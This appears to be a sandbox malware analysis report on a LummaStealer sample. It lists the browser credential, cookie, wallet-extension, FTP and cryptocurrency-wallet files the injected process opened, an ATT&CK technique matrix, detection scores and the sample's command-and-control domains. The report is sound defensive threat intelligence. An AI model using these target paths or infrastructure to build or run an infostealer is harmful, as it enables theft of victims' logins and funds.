                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                Source: Yara matchFile source: 00000002.00000003.1796834201.0000000002B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7696, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7696, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts311
                Process Injection
                11
                Deobfuscate/Decode Files or Information
                LSASS Memory1
                File and Directory Discovery
                Remote Desktop Protocol41
                Data from Local System
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)4
                Obfuscated Files or Information
                Security Account Manager33
                System Information Discovery
                SMB/Windows Admin Shares1
                Screen Capture
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing
                NTDS351
                Security Software Discovery
                Distributed Component Object Model3
                Clipboard Data
                Protocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets23
                Virtualization/Sandbox Evasion
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading
                Cached Domain Credentials1
                Process Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items23
                Virtualization/Sandbox Evasion
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                Process Injection
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                9cOUjp7ybm.exe66%ReversingLabsWin32.Exploit.LummaC
                9cOUjp7ybm.exe67%VirustotalBrowse
                9cOUjp7ybm.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\gdi32.dll68%ReversingLabsWin32.Trojan.LummaStealer
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://undesirabkel.click:443/apiK100%Avira URL Cloudmalware
                https://undesirabkel.click/apirs100%Avira URL Cloudmalware
                https://undesirabkel.click/100%Avira URL Cloudmalware
                https://undesirabkel.click:443/api100%Avira URL Cloudmalware
                https://undesirabkel.click:443/apiE100%Avira URL Cloudmalware
                https://undesirabkel.click/apiL7100%Avira URL Cloudmalware
                https://undesirabkel.click/apia7p_=100%Avira URL Cloudmalware
                https://undesirabkel.click/d100%Avira URL Cloudmalware
                https://undesirabkel.click/a100%Avira URL Cloudmalware
                undesirabkel.click100%Avira URL Cloudmalware
                https://undesirabkel.click/apiam100%Avira URL Cloudmalware
                https://undesirabkel.click/api:5100%Avira URL Cloudmalware
                https://undesirabkel.click/apiG5s_100%Avira URL Cloudmalware
                https://undesirabkel.click/api100%Avira URL Cloudmalware
                https://undesirabkel.click/#100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                undesirabkel.click
                188.114.96.3
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  undesirabkel.clicktrue
                  • Avira URL Cloud: malware
                  unknown
                  rabidcowse.shopfalse
                    high
                    wholersorie.shopfalse
                      high
                      https://undesirabkel.click/apitrue
                      • Avira URL Cloud: malware
                      unknown
                      cloudewahsj.shopfalse
                        high
                        noisycuttej.shopfalse
                          high
                          nearycrepso.shopfalse
                            high
                            framekgirus.shopfalse
                              high
                              tirepublicerj.shopfalse
                                high
                                abruptyopsn.shopfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://undesirabkel.click:443/apiKaspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://undesirabkel.click:443/apiEaspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://undesirabkel.click/apiL7aspnet_regiis.exe, 00000002.00000002.2941737109.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1816229667.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2003375329.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1815938104.0000000002B43000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17aspnet_regiis.exe, 00000002.00000003.1766585638.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730631937.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730433864.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766680237.0000000004F29000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://undesirabkel.click/aspnet_regiis.exe, 00000002.00000003.1837433126.0000000002ADC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://undesirabkel.click:443/apiaspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://undesirabkel.click/apirsaspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiaspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://x1.c.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.i.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installaspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://undesirabkel.click/aaspnet_regiis.exe, 00000002.00000003.1806587367.0000000004ED1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1810076497.0000000004ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://undesirabkel.click/daspnet_regiis.exe, 00000002.00000003.1806555687.0000000002ADD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://undesirabkel.click/apia7p_=aspnet_regiis.exe, 00000002.00000002.2941737109.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2003375329.0000000002B3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgaspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
